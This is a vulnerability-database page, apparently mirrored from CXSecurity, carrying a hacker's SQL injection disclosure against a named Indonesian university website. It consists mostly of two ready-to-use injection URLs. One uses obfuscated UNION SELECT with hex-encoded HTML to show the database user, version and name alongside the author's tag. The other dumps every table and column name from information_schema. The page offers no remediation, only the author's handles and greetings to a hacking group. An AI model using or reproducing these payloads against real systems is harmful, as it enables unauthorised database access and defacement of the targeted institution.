UIN Alauddin Makassar Sql Injection Vulner - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1865804 漏洞类型
发布时间 2019-12-18 更新时间 2019-12-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019120079
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#Nick name : KHS1N Cyber 07
#Youtube     : HCT Sec07
#contact      : kuliahdopermanent@gmail.com

Vulnerabilty : 
#SQL Injection

domain site && payload :
http://uin-alauddin.ac.id/agenda--227-rektor-menghadiri-pelantiknan-rektor-periode-20192023'+/*!50000UnIoN*/+/*!50000SeLeCt*/+1,concat(0x3c696d67207372633d27687474703a2f2f7777772e736168616261746365726461732e636f6d2f61737365742f666f746f5f6265726974612f4843545f7468756d626e61696c2e706e67273e,0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22726564222073697a653d2235223e496e6a656374204279204b4853314e2043796265722030373c2f666f6e743e3c2f703e,0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22677265656e222073697a653d2233223e47656e657261736920506563696e74612054656e74652d54656e7465204769762c204c696665626f792c206c75782c2068616e64626f64792c204e796f6b2a702043722a2a743c2f666f6e743e3c2f703e,0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22677265656e222073697a653d2236223e557365723a3a3a3c2f666f6e743e3c2f703e,user(),0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22626c7565222073697a653d2236223e56657273693a3a3a3c2f666f6e743e3c2f703e,version(),0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d226f72616e6765222073697a653d2236223e44617461626173653a3a3a3c2f666f6e743e3c2f703e,database()),3,4,5,6,7,8,9,10--+--.html

http://uin-alauddin.ac.id/agenda--227-rektor-menghadiri-pelantiknan-rektor-periode-20192023'+/*!50000UnIoN*/+/*!50000SeLeCt*/+1,/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/,3,4,5,6,7,8,9,10--+--.html

HCI Indonesia, bartes dwky, lammer permanent, and for all member